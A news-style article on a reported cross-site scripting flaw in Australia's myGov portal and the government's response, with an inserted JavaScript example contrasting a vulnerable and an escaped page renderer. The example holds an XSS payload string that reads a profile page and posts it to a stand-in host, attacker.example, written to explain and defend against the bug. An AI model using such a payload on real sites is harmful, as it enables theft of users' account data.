The Australian myGov website, the online portal through which Australians access public services, was recently reported as vulnerable to hacking by security expert Nick Cubrilovic. The government website, which stores sensitive and private records of millions of Australians, is said to be vulnerable to cross-site scripting (XSS). This class of flaw is among the most common findings in web application penetration tests.
Many IT security experts consider what Nick Cubrilovic did a basic attack. It shows how easily an attacker could get past whatever defences myGov has; a network firewall does nothing against cross-site scripting, because the malicious script is delivered through the victim's own browser and runs with the user's logged-in session. myGov's poor security is only attracting trouble.
To spy on a user or steal information from the site, an attacker only needs the myGov user to visit another website containing malicious code; that code then silently extracts sensitive information when the user accesses his or her myGov account. Private information is recorded on the site. Childcare, Medicare, welfare payment, insurance, e-Health and tax records could then be accessed by unauthorized parties at any time.
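The paragraph above describes the bug class in general terms. The following is an added illustration of reflected cross-site scripting and its fix; it is not myGov's code and says nothing about how the actual portal was built. The page template, the `name` query parameter, the `/profile` path and the attacker host `attacker.example` are all assumptions made for the example.

```javascript
// Added example of the XSS bug class the article describes. This is NOT
// myGov's code; the template, parameter name, paths and attacker host are
// assumptions made for illustration.

// Minimal HTML escaper: neutralises the characters that let attacker input
// break out of text or attribute context.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable: a reflected request parameter is interpolated straight into
// the page, so a crafted link on a third-party site controls the markup.
function renderVulnerable(params) {
  return `<p>Welcome back, ${params.name}.</p>`;
}

// Hardened: the same page, with output encoding applied at the point where
// untrusted data is inserted into HTML.
function renderFixed(params) {
  return `<p>Welcome back, ${escapeHtml(params.name)}.</p>`;
}

// Small checker used by the demo: does the rendered page contain a <script>
// element? The template itself has none, so any hit was injected.
function containsInjectedScript(html) {
  return /<script\b/i.test(html);
}

// Constructed payload of the kind planted in a link on an attacker-controlled
// site. Because the script runs in the victim's origin with the victim's
// session, it can read account pages and ship them off-site. (Not executed
// here; it is only a string that the renderers embed.)
const PAYLOAD =
  '<script>fetch("/profile").then(r=>r.text())' +
  '.then(t=>fetch("https://attacker.example/x",{method:"POST",body:t}))</script>';

// Render the same hostile input through both versions and report whether the
// injected script survived into the page.
function demo() {
  const params = { name: PAYLOAD };
  return {
    vulnerable: containsInjectedScript(renderVulnerable(params)),
    fixed: containsInjectedScript(renderFixed(params)),
  };
}

console.log(demo()); // { vulnerable: true, fixed: false }
```

The fix is contextual output encoding at the point of insertion, not input filtering on the way in; a value that is safe in one context (HTML text) is not automatically safe in another (an attribute, a URL, or inline JavaScript), so each insertion point needs the encoder for its own context.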
Mr. Cubrilovic reported the vulnerabilities to the Australian government's chief technology officer, John Sheridan. Afterwards, the chief information security officer of the Department of Human Services (which manages my.Gov.au) responded to Mr. Cubrilovic but did not really address the issue.
The department also stated that the data is in very safe hands and that there is nothing to worry about. It added that it routinely tests the myGov website for security flaws. The agency did not clarify whether any accounts had actually been hijacked.
Troy Hunt and Ty Miller, both IT security experts, agree that the data recorded on the myGov website was definitely not safe. The question now is how long these vulnerabilities have existed. Millions of Australians confidently entrust their private records to the site, yet there is a real chance of their myGov accounts being compromised.
This serious security flaw in the myGov site should be dealt with at once. The Australian government should fix it immediately to prevent any more accounts from being hijacked.